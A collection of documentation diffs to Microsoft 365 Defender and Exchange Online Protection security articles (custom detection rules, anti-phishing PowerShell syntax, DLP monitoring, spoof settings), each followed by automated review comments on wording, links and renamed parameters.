- ![Screenshot of the create detection rule page where you can choose the parameters of the impacted entities](../../media/mtp/fig24.png)
-
+4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
-4. Determine what actions should take place if the alert is triggered. In this case, run an antivirus scan, though other actions could be taken.
+ ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
- ![Screenshot of the create detection rule page where you can run an antivirus scan when an alert is triggered to help address threats](../../media/mtp/fig25.png)
+5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
-5. Select the scope for the alert rule. Since this query involve devices, the device groups are relevant in this custom detection according to Microsoft Defender for Endpoint context. When creating a custom detection that does not include devices as impacted entities, scope does not apply.
+ ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that you'll see](../../media/mtp/fig26.png)
- ![Screenshot of the create detection rule page where you can set the scope for the alert rule manages your expectations for the results that youΓÇÖll see](../../media/mtp/fig26.png)
+ For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
- For this pilot, you might want to limit this rule to a subset of testing devices in your production environment.
+6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-6. Select **Create**. Then, select **Custom detection rules** from the navigation panel.
-
- ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
+ ![Screenshot of Custom detection rules option in the menu](../../media/mtp/fig27a.png)
- ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
+ ![Screenshot of the detection rules page which displays the rule and execution details](../../media/mtp/fig27b.png)
- From this page, you can select the detection rule, which will open a details page.
+ From this page, you can select the detection rule, which will open a details page.
- ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
+ ![Screenshot of the email attachments page where you can see the status of the rule execution, triggered alerts and actions, edit the detection, and so on](../../media/mtp/fig28.png)
### Additional advanced hunting walk-through exercises To learn more about advanced hunting, the following webcasts will walk you through the capabilities of advanced hunting within Microsoft 365 Defender to create cross-pillar queries, pivot to entities and create custom detections and remediation actions.
->[!NOTE]
->Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
+> [!NOTE]
+> Be prepared with your own GitHub account to run the hunting queries in your pilot test lab environment.
-| Title | Description | Download MP4 | Watch on YouTube | CSL file to use |
-|:-----|:-----|:-----|:-----|:-----|
-| Episode 1: KQL fundamentals | WeΓÇÖll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators. | [ MP4](https://aka.ms/MTP15JUL20_MP4) | [YouTube](https://youtu.be/0D9TkGjeJwM) | [Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl) |
-| Episode 2: Joins | WeΓÇÖll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join. | [MP4](https://aka.ms/MTP22JUL20_MP4) | [YouTube](https://youtu.be/LMrO6K5TWOU) | [Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl) |
-| Episode 3: Summarizing, pivoting, and visualizing data|Now that weΓÇÖre able to filter, manipulate, and join data, itΓÇÖs time to start summarizing, quantifying, pivoting, and visualizing. In this episode, weΓÇÖll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis. | [MP4](https://aka.ms/MTP29JUL20_MP4) | [YouTube](https://youtu.be/UKnk9U1NH6Y) | [Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl) |
-| Episode 4: LetΓÇÖs hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, weΓÇÖll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response. | [MP4](https://aka.ms/MTP5AUG20_MP4) | [YouTube](https://youtu.be/2EUxOc_LNd8) | [Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl) |
+|Title|Description|Download MP4|Watch on YouTube|CSL file to use|
+|---|---|---|---|---|
+|Episode 1: KQL fundamentals|We'll cover the basics of advanced hunting capabilities in Microsoft 365 Defender. Learn about available advanced hunting data and basic KQL syntax and operators.|[MP4](https://aka.ms/MTP15JUL20_MP4)|[YouTube](https://youtu.be/0D9TkGjeJwM)|[Episode 1: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%201%20-%20KQL%20Fundamentals.csl)|
+|Episode 2: Joins|We'll continue learning about data in advanced hunting and how to join tables together. Learn about inner, outer, unique, and semi joins, and the nuances of the default Kusto innerunique join.|[MP4](https://aka.ms/MTP22JUL20_MP4)|[YouTube](https://youtu.be/LMrO6K5TWOU)|[Episode 2: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%202%20-%20Joins.csl)|
+|Episode 3: Summarizing, pivoting, and visualizing data|Now that we're able to filter, manipulate, and join data, it's time to start summarizing, quantifying, pivoting, and visualizing. In this episode, we'll cover the summarize operator and some of the calculations you can perform while diving into additional tables in the advanced hunting schema. We turn our datasets into charts that can help improve analysis.|[MP4](https://aka.ms/MTP29JUL20_MP4)|[YouTube](https://youtu.be/UKnk9U1NH6Y)|[Episode 3: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%203%20-%20Summarizing%2C%20Pivoting%2C%20and%20Joining.csl)|
+|Episode 4: Let's hunt! Applying KQL to incident tracking|Time to track some attacker activity! In this episode, we'll use our improved understanding of KQL and advanced hunting in Microsoft 365 Defender to track an attack. Learn some of the tips and tricks used in the field to track attacker activity, including the ABCs of cybersecurity and how to apply them to incident response.|[MP4](https://aka.ms/MTP5AUG20_MP4)|[YouTube](https://youtu.be/2EUxOc_LNd8)|[Episode 4: CSL file in Git](https://github.com/microsoft/Microsoft-threat-protection-Hunting-Queries/blob/master/Webcasts/TrackingTheAdversary/Episode%204%20-%20Lets%20Hunt.csl)|
+|
## Next step
-|![Closing and summary phase](../../media/mtp/close.png) <br>[Closing and summary phase](mtp-pilot-close.md) | Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
-|:-----|:-----|
+|![Closing and summary phase](../../media/mtp/close.png) <br>[Closing and summary phase](mtp-pilot-close.md)|Analyze your Microsoft 365 Defender pilot outcome, present them to your stakeholders, and take the next step.
+|:-----|:-----|
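Review bot: The filter step and the query beneath it name different columns. The prose tells the reader to click **+** beside yahoo.com "under the SenderFromDomain section", but the query that follows is `| where SenderMailFromDomain == "yahoo.com"`. In EmailEvents these are separate fields (the From header domain and the MAIL FROM envelope domain), and they can differ for spoofed or relayed mail, so a reader who copies the query may not get the same rows as the UI filter. Please make the step and the query use the same column, or say which one the filter pane actually adds. Separately, the webcast table now ends with a lone `+|` line after the Episode 4 row, which looks like a stray edit and should be dropped.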
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/troubleshoot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/troubleshoot.md
@@ -14,7 +14,7 @@ author: mjcaparas
ms.localizationpriority: medium manager: dansimp audience: ITPro
-ms.collection: M365-security-compliance
+ms.collection: M365-security-compliance
ms.topic: conceptual search.appverid: - MOE150
@@ -31,18 +31,18 @@ search.appverid:
This section addresses issues that might arise as you use the Microsoft 365 Defender service. - ## I don't see Microsoft 365 Defender content
-If you don't see capabilities on the navigation pane such as the Incidents, Action Center, or Hunting in your portal, you'll need to verify that your tenant has the appropriate licenses.
+
+If you don't see capabilities on the navigation pane such as the Incidents, Action Center, or Hunting in your portal, you'll need to verify that your tenant has the appropriate licenses.
For more information, see [Prerequisites](prerequisites.md). ## Microsoft Defender for Identity alerts are not showing up in the Microsoft 365 Defender incidents
-If you have Microsoft Defender for Identity deployed in your environment but you're not seeing Defender for Identity alerts as part of Microsoft 365 Defender incidents, you'll need to ensure that the Microsoft Cloud App Security and Defender for Identity integration is enabled.
-For more information, see [Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/aatp-integration).
+If you have Microsoft Defender for Identity deployed in your environment but you're not seeing Defender for Identity alerts as part of Microsoft 365 Defender incidents, you'll need to ensure that the Microsoft Cloud App Security and Defender for Identity integration is enabled.
+
+For more information, see [Microsoft Defender for Identity integration](https://docs.microsoft.com/cloud-app-security/mdi-integration).
## Where is the settings page for turning the service on?
-To turn on Microsoft 365 Defender, access **Settings** from the navigation pane in the Microsoft 365 security center. This navigation item is visible only if you have the [prerequisite permissions and licenses](mtp-enable.md#check-license-eligibility-and-required-permissions).
-
+To turn on Microsoft 365 Defender, access **Settings** from the navigation pane in the Microsoft 365 security center. This navigation item is visible only if you have the [prerequisite permissions and licenses](mtp-enable.md#check-license-eligibility-and-required-permissions).
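Review bot: The only substantive change in this hunk is the link target in the Defender for Identity section, which moves from `cloud-app-security/aatp-integration` to `cloud-app-security/mdi-integration`; the remaining -/+ pairs appear to differ in whitespace only. Please confirm the new slug resolves before merging, and consider using the same relative-link style as `prerequisites.md` and `mtp-enable.md` elsewhere in this hunk if the target is reachable that way.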
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-anti-phishing-policies-eop https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/configure-anti-phishing-policies-eop.md
@@ -301,7 +301,7 @@ Creating an anti-phishing policy in PowerShell is a two-step process:
To create an anti-phish policy, use this syntax: ```PowerShell
-New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableAntiSpoofEnforcement <$true | $false>] [-AuthenticationFailAction <MoveToJmf | Quarantine>] [-EnableUnauthenticatedSender <$true | $false>]
+New-AntiPhishPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableSpoofIntelligence <$true | $false>] [-AuthenticationFailAction <MoveToJmf | Quarantine>] [-EnableUnauthenticatedSender <$true | $false>]
``` This example creates an anti-phish policy named Research Quarantine with the following settings:
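Review bot: The syntax line renames `-EnableAntiSpoofEnforcement` to `-EnableSpoofIntelligence`, but the "Research Quarantine" example introduced by the next context line is outside this hunk and is not touched. Please check that the example command and its list of settings use the new parameter name as well, so the syntax block and the worked example do not disagree.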
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/email-validation-and-authentication https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-validation-and-authentication.md
@@ -140,7 +140,7 @@ You can use this method to resolve intra-org spoofing and cross-domain spoofing
- [Consider setting up DMARC records](use-dmarc-to-validate-email.md) for your domain to determine your legitimate senders.
-Microsoft doesn't provide detailed implementation guidelines for SPF, DKIM, and DMARC records. However, there's many information available online. There are also third party companies dedicated to helping your organization setup email authentication records.
+Microsoft doesn't provide detailed implementation guidelines for SPF, DKIM, and DMARC records. However, there's many information available online. There are also third party companies dedicated to helping your organization set up email authentication records.
#### You don't know all sources for your email
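Review bot: The edited line fixes "setup" to "set up" but keeps "there's many information available online" in the preceding sentence, which is still ungrammatical. Since the line is already being changed, suggest "there's a lot of information available online", and hyphenating "third-party companies" in the same pass.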
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/how-policies-and-protections-are-combined https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/how-policies-and-protections-are-combined.md
@@ -61,7 +61,7 @@ For example, consider the following anti-phishing policies in Microsoft Defender
|Policy B|2|Off|On| |
-1. The message is marked and treated as spoof, because spoofing has a higher priority (4) than user impersonation (8).
+1. The message is marked and treated as spoof, because spoofing has a higher priority (4) than user impersonation (5).
2. Policy A is applied to the users because it has a higher priority than Policy B. 3. Based on the settings in Policy A, no action is taken on the message, because anti-spoofing is turned off in the policy. 4. Policy processing stops, so Policy B is never applied to the users.
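Review bot: In step 1 the corrected sentence reads "spoofing has a higher priority (4) than user impersonation (5)", which relies on the reader knowing that a lower number means higher precedence. Please confirm that 5 matches the numbered protection order given earlier in the article, and consider wording such as "spoofing (4) is evaluated before user impersonation (5)" so the parenthesised numbers cannot be misread as the policy priorities 1 and 2 shown in the table above.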
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/learn-about-spoof-intelligence https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/learn-about-spoof-intelligence.md
@@ -202,7 +202,7 @@ To verify that you've configured spoof intelligence with senders who are allowed
- In Exchange Online PowerShell, replace \<Name\> with Office365 AntiPhish Default or the name of a custom policy, and run the following command to verify the settings: ```PowerShell
- Get-AntiPhishPolicy -Identity "<Name>" | Format-List EnableAntiSpoofEnforcement,EnableUnauthenticatedSender,AuthenticationFailAction
+ Get-AntiPhishPolicy -Identity "<Name>" | Format-List EnableSpoofIntelligence,EnableUnauthenticatedSender,AuthenticationFailAction
``` ## Other ways to manage spoofing and phishing
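Review bot: The verification command now lists `EnableSpoofIntelligence`, `EnableUnauthenticatedSender` and `AuthenticationFailAction`, but the step as shown only says to "verify the settings" without stating what values indicate a correct configuration. If that is not covered elsewhere in the section, add the expected values after the command. The default policy name "Office365 AntiPhish Default" would also read more clearly in code formatting, since it is a literal to paste into `-Identity`.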
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/monitor-for-leaks-of-personal-data https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/monitor-for-leaks-of-personal-data.md
@@ -30,15 +30,15 @@ There are many tools that can be used to monitor the use and transport of person
In the illustration: -- Start with Microsoft 365 data loss prevention reports for monitoring personal data in SharePoint Online, OneDrive for Business, and email in transit. These provide the greatest level of detail for monitoring personal data. However, these reports don't include all services in Office 365.
+- Start with Microsoft 365 data loss prevention reports for monitoring personal data in SharePoint Online, OneDrive for Business, and email in transit. These reports provide the greatest level of detail for monitoring personal data. However, these reports don't include all services in Office 365.
-- Next, use alert policies and the audit log to monitor activity across services. Setup ongoing monitoring or search the audit log to investigate an incident. The audit log works across services ΓÇö Sway, PowerBI, eDiscovery, Dynamics 365, Microsoft Flow, Microsoft Teams, Admin activity, OneDrive for Business, SharePoint Online, mail in transit, and mailboxes at rest. Skype conversations are included in mailboxes at rest.
+- Next, use alert policies and the audit log to monitor activity across services. Set up ongoing monitoring or search the audit log to investigate an incident. The audit log works across servicesΓÇöSway, Power BI, eDiscovery, Dynamics 365, Microsoft Flow, Microsoft Teams, Admin activity, OneDrive for Business, SharePoint Online, mail in transit, and mailboxes at rest. Skype conversations are included in mailboxes at rest.
-- Finally, Use Microsoft Cloud App Security to monitor files with sensitive data in other SaaS providers. Coming soon is the ability to use sensitive information types and unified labels across Azure Information Protection and Office with Cloud App Security. You can setup policies that apply to all of your SaaS apps or specific apps (like Box). Cloud App Security doesn't discover files in Exchange Online, including files attached to email.
+- Finally, Use Microsoft Cloud App Security to monitor files with sensitive data in other SaaS providers. Coming soon is the ability to use sensitive information types and unified labels across Azure Information Protection and Office with Cloud App Security. You can set up policies that apply to all of your SaaS apps or specific apps (like Box). Cloud App Security doesn't discover files in Exchange Online, including files attached to email.
## Data loss prevention reports
-After you create your data loss prevention (DLP) policies, you'll want to verify that they're working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they're trending up or down over time; filter the report in different ways; and view additional details by selecting a point on a line on the graph.
+After you create your data loss prevention (DLP) policies, you'll want to verify that they're working as you intended and helping you to stay compliant. With the DLP reports in Office 365, you can quickly view the number of DLP policy matches, overrides, or false positives; see whether they're trending up or down over time; filter the report in different ways; and view more details by selecting a point on a line on the graph.
You can use the DLP reports to:
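Review bot: The third bullet is edited for "set up" but still begins "Finally, Use Microsoft Cloud App Security" with a capitalised "Use" mid-sentence. The same line keeps "Coming soon is the ability to use sensitive information types and unified labels", which will go stale; suggest removing it or rewording without a time reference. In the second bullet the spaces around the dash before "Sway" were removed while "PowerBI" became "Power BI", so please check that the dash style matches the rest of the article.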
@@ -54,7 +54,7 @@ You can use the DLP reports to:
- View a list of files with sensitive data that matches your DLP policies in the details pane.
-In addition, you can use the DLP reports to fine tune your DLP policies as you run them in test mode.
+In addition, you can use the DLP reports to fine-tune your DLP policies as you run them in test mode.
DLP reports are in the security center and the compliance center. Navigate to Reports \> View reports. Under Data loss prevention (DLP), go to either DLP policy and rule matches or DLP false positives and overrides.
@@ -68,15 +68,15 @@ The audit log contains events from Exchange Online, SharePoint Online, OneDrive
The security center and compliance center provide two ways to monitor and report against the audit log: -- Setup alert policies, view alerts, and monitor trends ΓÇö Use the alert policy and alert dashboard tools in either the security center or compliance center.
+- Set up alert policies, view alerts, and monitor trendsΓÇöUse the alert policy and alert dashboard tools in either the security center or compliance center.
-- Search the audit log directly ΓÇö Search for all events in a specified date rage. Or you can filter the results based on specific criteria, such as the user who performed the action, the action, or the target object.
+- Search the audit log directly: Search for all events in a specified date rage. Or you can filter the results based on specific criteria, such as the user who performed the action, the action, or the target object.
-Information security and compliance teams can use these tools to proactively review activities performed by both end users and administrators across services. Automatic alerts can be configured to send email notifications when certain activities occur on specific site collections - for example when content is shared from sites known to contain GDPR related information. This allows those teams to follow up with users to ensure that corporate security policies are followed, or to provide additional training.
+Information security and compliance teams can use these tools to proactively review activities performed by both end users and administrators across services. Automatic alerts can be configured to send email notifications when certain activities occur on specific site collections - for example when content is shared from sites known to contain GDPR-related information. This allows those teams to follow up with users to ensure that corporate security policies are followed, or to provide additional training.
-Information security teams can also search the audit log to investigate suspected data breaches and determine both root cause and the extent of the breach. This built in capability facilitates compliance with article 33 and 34 of the GDPR, which require notifications be provided to the GDPR supervisory authority and to the data subjects themselves of a data breach within a specific time period. Audit log entries are only retained for 90 days within the service - it is often recommended and many organizations required that these logs be retained for longer periods of time.
+Information security teams can also search the audit log to investigate suspected data breaches and determine both root cause and the extent of the breach. This built-in capability facilitates compliance with article 33 and 34 of the GDPR, which require notifications be provided to the GDPR supervisory authority and to the data subjects themselves of a data breach within a specific time period. Audit log entries are only retained for 90 days within the service - it is often recommended and many organizations required that these logs be retained for longer periods of time.
-Solutions are available which subscribe to the Unified Audit Logs through the Microsoft Management Activity API and can both store log entries as needed, and provide advanced dashboards and alerts. One example is [Microsoft Operations Management Suite (OMS)](https://docs.microsoft.com/azure/operations-management-suite/oms-solution-office-365).
+Solutions are available that subscribe to the Unified Audit Logs through the Microsoft Management Activity API and can both store log entries as needed, and provide advanced dashboards and alerts. One example is [Microsoft Operations Management Suite (OMS)](https://docs.microsoft.com/azure/operations-management-suite/oms-solution-office-365).
More information about alert policies and searching the audit log:
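Review bot: the added "Search the audit log directly:" line still reads "a specified date rage", which should be "date range". The retention sentence touched in the same hunk also keeps "many organizations required that these logs be retained"; "require" is the intended tense. Both are in lines this change already rewrites, so they can be fixed here.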
@@ -94,11 +94,11 @@ More information about alert policies and searching the audit log:
## Microsoft Cloud App Security
-Microsoft Cloud App Security helps you discover other SaaS apps in use across your networks and sensitive data that is sent to and from these apps.
+Microsoft Cloud App Security helps you discover other SaaS apps in use across your networks and sensitive data sent to and from these apps.
-Microsoft Cloud App Security is a comprehensive service providing deep visibility, granular controls and enhanced threat protection for your cloud apps. It identifies more than 15,000 cloud applications in your network-from all devices-and provides risk scoring and ongoing risk assessment and analytics. No agents required: information is collected from your firewalls and proxies to give you complete visibility and context for cloud usage and shadow IT.
+Microsoft Cloud App Security is a comprehensive service providing deep visibility, granular controls, and enhanced threat protection for your cloud apps. It identifies more than 15,000 cloud applications in your network-from all devices-and provides risk scoring and ongoing risk assessment and analytics. No agents required: information is collected from your firewalls and proxies to give you complete visibility and context for cloud usage and shadow IT.
-To better understand your cloud environment, Cloud App Security investigate feature provides deep visibility into all activities, files and accounts for sanctioned and managed apps. You can gain detailed information on a file level and discover where data travels in the cloud apps.
+To better understand your cloud environment, the Cloud App Security investigate feature provides deep visibility into all activities, files, and accounts for sanctioned and managed apps. You can gain detailed information on a file level and discover where data travels in the cloud apps.
For examples, the following illustration demonstrates two Cloud App Security policies that can help with GDPR.
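Review bot: the rewritten Cloud App Security paragraph still has "in your network-from all devices-and provides", where bare hyphens stand in for dashes and the phrase reads as one run-on word. Setting the aside off with commas ("in your network, from all devices, and provides") would fix it. The trailing context line "For examples, the following illustration" should be "For example," and could be picked up in the same pass.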
@@ -145,7 +145,7 @@ Alert when a file containing a credit card number is shared from an approved clo
|Category|DLP| |Filter settings|Access level = Public (Internet), Public, External <p> App = \<select apps\> (use this setting if you want to limit monitoring to specific SaaS apps)| |Apply to|All files, all owners|
-|Content inspection|Includes files that match a present expression: All countries: Finance: Credit card number <p> Don't require relevant context: unchecked (this will match keywords as well as regex) <p> Includes files with at least 1 match <p> Unmask the last 4 characters of the violation: checked|
+|Content inspection|Includes files that match a present expression: All countries: Finance: Credit card number <p> Don't require relevant context: unchecked (this setting will match keywords as well as regex) <p> Includes files with at least 1 match <p> Unmask the last 4 characters of the violation: checked|
|Alerts|Create an alert for each matching file: checked <p> Daily alert limit: 1000 <p> Select an alert as email: checked <p> To: infosec@contoso.com| |Governance|Microsoft OneDrive for Business <p> Make private: check Remove External Users <p> All other settings: unchecked <p> Microsoft SharePoint Online <p> Make private: check Remove External Users <p> All other settings: unchecked| |
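Review bot: in the Content inspection row, "Includes files that match a present expression" is carried over unchanged from the old line and reads like a typo for "preset expression". Since this row defines what the DLP policy actually matches on, confirm the wording against the policy UI and correct it in this change rather than only adjusting "this will" to "this setting will".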
@@ -180,5 +180,5 @@ Notes:
Similar policies: -- Detect large downloads of Customer data or HR Data ΓÇö Alert when a large number of files containing customer data or HR data have been detected being downloaded by a single user within a short period of time.-- Detect Sharing of Customer and HR Data ΓÇö Alert when files containing Customer or HR Data are shared.
+- Detect large downloads of Customer data or HR DataΓÇöAlert when a large number of files containing customer data or HR data have been detected being downloaded by a single user within a short period of time.
+- Detect Sharing of Customer and HR DataΓÇöAlert when files containing Customer or HR Data are shared.
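Review bot: the two added "Similar policies" items join the policy name and its description with an unspaced dash (shown on this page as the mis-decoded sequence "ΓÇö"), while the first hunk in this same file replaced that separator with a colon ("Search the audit log directly:"). Use the colon here too so the file is consistent and the list survives encoding problems. "have been detected being downloaded by a single user" could also be tightened to "are downloaded by a single user".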
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365-atp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/recommended-settings-for-eop-and-office365-atp.md
@@ -133,7 +133,7 @@ For more information about these settings, see [Spoof settings](set-up-anti-phis
|Security feature name|Default|Standard|Strict|Comment| |---|:---:|:---:|:---:|---|
-|**Enable anti-spoofing protection** <p> _EnableAntispoofEnforcement_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
+|**Enable anti-spoofing protection** <p> _EnableSpoofIntelligence_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
|**Enable Unauthenticated Sender** <p> _EnableUnauthenticatedSender_|On <p> `$true`|On <p> `$true`|On <p> `$true`|Adds a question mark (?) to the sender's photo in Outlook for unidentified spoofed senders. For more information, see [Spoof settings in anti-phishing policies](set-up-anti-phishing-policies.md).| |**If email is sent by someone who's not allowed to spoof your domain** <p> _AuthenticationFailAction_|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Quarantine the message** <p> `Quarantine`|This setting applies to blocked senders in [spoof intelligence](learn-about-spoof-intelligence.md).| |
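Review bot: the changed row swaps the parameter shown to readers from _EnableAntispoofEnforcement_ to _EnableSpoofIntelligence_ but leaves the Comment cell empty, so anyone who scripted against the old name from this table gets no pointer to the rename. Add a short comment noting the previous parameter name, or link the spoof intelligence article that the _AuthenticationFailAction_ row already references.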
@@ -187,7 +187,7 @@ Note that these are the same settings that are available in [anti-spam policy se
|Security feature name|Default|Standard|Strict|Comment| |---|---|---|---|---|
-|**Enable anti-spoofing protection** <p> _EnableAntispoofEnforcement_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
+|**Enable anti-spoofing protection** <p> _EnableSpoofIntelligence_|On <p> `$true`|On <p> `$true`|On <p> `$true`||
|**Enable Unauthenticated Sender** <p> _EnableUnauthenticatedSender_|On <p> `$true`|On <p> `$true`|On <p> `$true`|Adds a question mark (?) to the sender's photo in Outlook for unidentified spoofed senders. For more information, see [Spoof settings in anti-phishing policies](set-up-anti-phishing-policies.md).| |**If email is sent by someone who's not allowed to spoof your domain** <p> _AuthenticationFailAction_|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Move message to the recipients' Junk Email folders** <p> `MoveToJmf`|**Quarantine the message** <p> `Quarantine`|This setting applies to blocked senders in [spoof intelligence](learn-about-spoof-intelligence.md).| |
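Review bot: this table's separator row is `|---|---|---|---|---|`, while the otherwise identical table in the previous hunk uses `|---|:---:|:---:|:---:|---|`, so the Default, Standard and Strict columns render with different alignment in the two sections. As the same row is being edited in both tables, align the separator rows in this change so the two copies of the spoof settings stay identical.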
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/s-mime-for-message-signing-and-encryption https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/s-mime-for-message-signing-and-encryption.md
@@ -55,7 +55,7 @@ The steps that you follow to set up S/MIME with each of these end points is slig
> [!NOTE] > You can't install S/MIME control in Outlook on the web on Mac, iOS, Android, or other non-Windows devices. For more information, see [Encrypt messages by using S/MIME in Outlook on the web](https://support.microsoft.com/office/878c79fc-7088-4b39-966f-14512658f480).
-## Setup S/MIME with Outlook on the web
+## Set up S/MIME with Outlook on the web
Setting up S/MIME for Exchange Online with Outlook on the web involves the following key steps:
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-your-eop-service https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/set-up-your-eop-service.md
@@ -13,7 +13,7 @@ ms.custom:
- seo-marvel-apr2020 localization_priority: Normal ms.assetid: d74c6ddf-11b0-43ee-b298-8bb0340895f0
-description: "Admins can learn how to setup standalone Exchange Online Protection (EOP) to protect on-premises email environments."
+description: "Admins can learn how to set up standalone Exchange Online Protection (EOP) to protect on-premises email environments."
--- # Set up your standalone EOP service
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/switch-to-eop-from-google-postini-the-barracuda-spam-and-virus-firewall-or-cisco https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/switch-to-eop-from-google-postini-the-barracuda-spam-and-virus-firewall-or-cisco.md
@@ -39,7 +39,7 @@ If you currently host your mailboxes on premises and use an on-premises protecti
## Switch to Exchange Online
-Perhaps you have on-premises mailboxes protected by an on-premises appliance, and you want to jump to Exchange Online cloud-hosted mailboxes and EOP protection to take advantage of Microsoft 365 cloud messaging and protection features. To get started, you can sign up for Microsoft 365 and add your domain. This scenario doesn't require you to setup connectors, because there isn't any routing to on-premises mailboxes. Begin at [Get the latest advanced features with Microsoft 365](https://www.microsoft.com/microsoft-365/business/compare-more-office-365-for-business-plans) to sign-up and get familiar with its features.
+Perhaps you have on-premises mailboxes protected by an on-premises appliance, and you want to jump to Exchange Online cloud-hosted mailboxes and EOP protection to take advantage of Microsoft 365 cloud messaging and protection features. To get started, you can sign up for Microsoft 365 and add your domain. This scenario doesn't require you to set up connectors, because there isn't any routing to on-premises mailboxes. Begin at [Get the latest advanced features with Microsoft 365](https://www.microsoft.com/microsoft-365/business/compare-more-office-365-for-business-plans) to sign-up and get familiar with its features.
During the Microsoft 365 setup process, you will create your cloud-based mailbox users.
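Review bot: the added paragraph fixes "setup connectors" to "set up connectors" but keeps "to sign-up and get familiar with its features" at the end of the same sentence group. The verb form is "sign up", as already used earlier in the paragraph ("you can sign up for Microsoft 365"), so the hyphen should go.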
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/troubleshooting-mail-sent-to-office-365 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/troubleshooting-mail-sent-to-office-365.md
@@ -123,7 +123,7 @@ Just as important as the way the emails are sent is the content they contain. Wh
- Redirects included in the body of the message should be similar and consistent, and not multiple and varied. A redirect in this context is anything that points away from the message, such as links and documents. If you have a lot of advertising or Unsubscribe links or Update the Profile links, they should all point to the same domain. For example:
- Correct:
+ Correct (all domains are the same):
`unsubscribe.bulkmailer.com`
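Review bot: the new label "Correct (all domains are the same)" is imprecise for the entries it introduces, which are hostnames such as `unsubscribe.bulkmailer.com`; a reader can take it to mean every link must use an identical hostname. Wording like "all links use the same parent domain" matches the rule stated in the bullet above, and the matching "Incorrect (all domains are different)" label in the next hunk should be adjusted the same way.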
@@ -131,7 +131,7 @@ Just as important as the way the emails are sent is the content they contain. Wh
`options.bulkmailer.com`
- Incorrect:
+ Incorrect (all domains are different):
`unsubscribe.bulkmailer.com`
security https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/use-dmarc-to-validate-email https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/use-dmarc-to-validate-email.md
